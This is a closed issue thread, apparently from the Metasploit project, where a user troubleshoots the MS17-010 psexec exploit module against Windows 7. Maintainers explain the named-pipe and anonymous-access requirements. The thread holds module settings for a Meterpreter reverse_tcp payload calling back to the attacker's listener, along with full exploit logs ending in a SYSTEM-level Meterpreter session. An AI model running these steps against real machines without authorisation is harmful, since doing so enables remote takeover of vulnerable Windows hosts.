Closed elibr1212 closed 6 years ago
What named pipes did the exploit find?
Actually, paste all your output.
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE true yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.0.0.28 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser berkhim no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.14 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.14:4444
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
i use kali ..
and i not set the smbpass
i set the smbuser
and the windows victem is windows 7
Is setting SMBUser
causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION
Also does the exploit work without setting SMBUser
?
STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.
Also does the exploit work without setting SMBUser ?
In Windows XP I tried without setting a username and password and it succeeded But on Windows 7 it did not work for me and I saw in another video that it did work Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s That's why it's confusing.
What error does it give when you try it without setting SMBUser?
msf > use exploit/windows/smb/ms17_010_psexec msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28 rhost => 10.0.0.28 msf exploit(windows/smb/ms17_010_psexec) > run
[] Started reverse TCP handler on 10.0.0.15:4444 [] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 10.0.0.28:445 - Unable to find accessible named pipe! [*] Exploit completed, but no session was created.``
Have you checked if the target is vulnerable to ms17_010?
Detecting an accessible named point is I think the entry point, if exploit doesn't find it, then I'm afraid it won't work at all..
yes . Yes it's my little brothers' computer and I'm learning with it So I opened Port 445 from the beginning msf> clear [*] exec: clear
msf> use auxiliary / scanner / smb / smb_ms17_010 msf proxy (scanner / smb / smb_ms17_010)> set rhosts 10.0.0.28 rhosts => 10.0.0.28 msf auxiliary (scanner / smb / smb_ms17_010)> run
[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf auxiliary (scanner / smb / smb_ms17_010)>``
set VERBOSE true
and try again, @elibr1212.
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
smsf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) >
``
What named pipes did the exploit find?
So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.
You either need creds, anonymous access how do I do it?
If you control the box you're testing, you can use known creds or enable anonymous access via https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously.
@wvu-r7 do we need to add named pipes like COMNAP, COMNODE
described in above article to the list?
"If you control the box you're testing" yes Now I checked the computer And I see that the sharing service is not working And that I try to run it in "services" It does not let turn on the render .. And I'll look at what you sent. Well done for the work you do! it's not taken for granted You are champions
Probably not if they're for IBM mainframes. :P
I opened a virtual machine (windows 7 x86) now lol And it worked [] Started reverse TCP handler on 10.0.0.15:4444 [] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0) [] 10.0.0.21:445 - Connected to named pipe: epmapper [] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8 [] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020 [] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8 [] 10.0.0.21:445 - Attempting leak #0 [] 10.0.0.21:445 - CONNECTION: 0x872c5010 [] 10.0.0.21:445 - SESSION: 0x9e286058 [] 10.0.0.21:445 - FLINK: 0x97353028 [] 10.0.0.21:445 - InParam: 0x9e2c20dc [] 10.0.0.21:445 - MID: 0xb03 [-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8 [] 10.0.0.21:445 - Align transaction and leak failed, attempt #0 [] 10.0.0.21:445 - Attempting leak #1 [] 10.0.0.21:445 - CONNECTION: 0x872c5010 [] 10.0.0.21:445 - SESSION: 0x9e286058 [] 10.0.0.21:445 - FLINK: 0x9e2d4050 [] 10.0.0.21:445 - InParam: 0x9e2ce0dc [] 10.0.0.21:445 - MID: 0xb03 [] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion [] 10.0.0.21:445 - Control of groom transaction [] 10.0.0.21:445 - Built a write-what-where primitive... [] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee [] 10.0.0.21:445 - Session Data: 0a02b2000000000058d4dd8501000000000000005cf775935cf775930800000010502c87000000000861289e020002000861289e00000000ba12ead606c6d30141b92cd706c6d301ffffffffffffff7fffffffffffffff7f00000000000000000000000000000000000000000000000000000000000000000000000000000000d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00 [] 10.0.0.21:445 - session dat len = 256 [] 10.0.0.21:445 - Session ctx offset = 80 [] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00 [] 10.0.0.21:445 - secCtxAddr: 9e2837d8 [] 10.0.0.21:445 - Reading secCtxData from 9e2837d8 [] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000 [] 10.0.0.21:445 - Overwrote token SID security context with fake context [+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained! [] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe [] 10.0.0.21:445 - PowerShell found [] 10.0.0.21:445 - Selecting PowerShell target [] 10.0.0.21:445 - Powershell command length: 2404 [] 10.0.0.21:445 - Executing the payload... [] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ... [] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ... [] 10.0.0.21:445 - Obtaining a service manager handle... [] 10.0.0.21:445 - Creating the service... [+] 10.0.0.21:445 - Successfully created the service [] 10.0.0.21:445 - Starting the service... [+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable... [] 10.0.0.21:445 - Removing the service... [+] 10.0.0.21:445 - Successfully removed the service [] 10.0.0.21:445 - Closing service handle... [] Sending stage (179779 bytes) to 10.0.0.21 [+] 10.0.0.21:445 - SYSTEM session cleaned up. [*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300
meterpreter > sysinfo Computer : WIN-IUAS33RLC03 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : he_IL Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
Did you read the module doc? info -d
may have been helpful.
I did it through the anonymity as you said .. And yes thanks.
Why am I just there and the user is showing me this? I understood that it was possible without a password .. How can you read even an article on the script how to use it?